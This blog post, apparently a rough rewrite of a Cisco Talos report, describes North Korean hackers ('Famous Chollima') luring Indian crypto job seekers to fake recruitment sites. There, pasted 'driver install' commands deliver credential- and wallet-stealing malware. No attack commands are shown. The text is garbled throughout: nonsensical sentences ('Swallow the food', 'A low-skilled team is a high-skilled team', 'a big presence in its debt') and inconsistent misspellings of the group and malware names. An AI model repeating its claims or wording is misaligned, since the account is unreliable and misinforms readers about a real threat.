Cisco Talos reported that a group of North Korean hackers, named “The Famous Cholima,” is focusing on attacks on Indian cryptography job seekers. This group apparently does not seem to be directly related to Lazarus.
At this point, it is difficult to determine whether these efforts are a major theft or a preliminary basis for a larger attack. Job seekers in the crypto industry need to pay attention to moving forward.
North Korea’s crypto hack continues
North Korean Lazarus Group has a horrific reputation for code crime and is committed the biggest hack in industry history. However, because North Korea has a big presence in its debt, it is not the country’s only Web3 criminal enterprise.
Cisco Talos has identified recent criminal activity in India, which is taking a different approach to crypto theft.
The report suggests that the famous cholima is not new. It has been working since mid-2024. In some recent incidents, North Korean hackers have tried to break into US-based crypto companies like Kraken by applying for open job listings.
The famous Cholima reversed seducing potential workers with fake applications.
“These campaigns include… creating fake job ads and skill test pages. The latter instructs users to copy and paste the malicious command line to install the drivers needed to carry out the final skill test phase.
Next to Lazarus’s horrifying reputation, the famous Chorima fishing efforts look much more clumsy. Cisco claimed that the group’s fake applications always mimic well-known crypto companies.
These lures used none of the actual company’s actual branding and asked questions that were rarely related to the expected work in question.
Fake Robinhood application used in hacks. Source: Cisco Talos
Swallow the food
Victims are seduced through fake recruitment sites disguised as well as well as technology or crypto companies. After filling out the application form, you will be invited to a video interview.
During this process, the site asks you to execute command line instructions asserted to be for installing video drivers that actually download and install malware.
Once installed, Pylanghost has full control over the victim’s system to the attacker. It steals login credentials, browser data, crypto wallet information, and targets over 80 popular extensions such as MetaMask, Phantom, and 1Password.
Recently, after thwarting a malware attack, Bitmex claimed that Lazarus is using at least two teams. A low-skilled team is a high-skilled team to first compromise security protocols and then commit subsequent theft. Perhaps this is a common practice in North Korean hacking communities.
Unfortunately, it is difficult to reach a solid conclusion without speculation. Does North Korea want to hack these applicants to better pose as job seekers in the crypto industry?
The UER should be aware of unsolicited recruitment, avoid running unknown commands, and protect the system with endpoint protection, MFA, and browser enhanced monitoring.
Always check the legitimacy of your recruitment portal before sharing any sensitive information.
Discover more from Earlybirds Invest
Subscribe to get the latest posts sent to your email.
